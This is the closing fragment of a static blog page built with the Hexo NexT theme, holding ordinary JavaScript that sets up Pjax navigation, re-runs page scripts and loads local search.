<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

    </div>
</body>
</html>
